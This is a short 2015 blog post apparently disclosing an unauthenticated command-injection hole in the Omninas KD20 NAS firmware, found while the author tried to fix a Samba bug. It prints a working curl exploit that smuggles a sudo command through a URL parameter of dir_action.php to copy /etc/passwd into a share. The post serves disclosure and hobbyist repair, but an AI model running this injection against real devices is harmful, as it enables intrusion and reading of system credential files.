There's always time to play

Sunday, February 15, 2015

Executing commands on Shuttle's Omninas KD20

Because the firmware on the Omninas KD20 is somewhat broken (see Samba bug #10584) I was trying to get access in an attempt to fix it. Fortunately some people figured there was easy access with old firmware and documented at nas-central how to decrypt the firmware, which applies to current firmware as well. Once I had rootfs.ubi mounted using nandsim I went looking for possible remote exploits and I found one in an external accessible page without password protection.

To make a long story short, this page will pass a GET variable right into an exec call without any verification. As a result, all you need to do is call curl with an url-encoded command as in the following example:

curl -F 'userfile=@/dev/null;filename="test.txt"' 'http://192.168.x.x/filesystem/api-1.0/dir_action.php?type=upload&p=%24(sudo%20cat%20%2Fetc%2Fpasswd%20%3E%20%2Fshare%2Fatonnas%2Fdisk%2Ftest.passwd)'

The above command will put the contents of /etc/passwd in test.passwd in the default 'disk' share. And yes, as a bonus you also get an empty file called test.txt in the same folder!

Happy hacking!

No comments: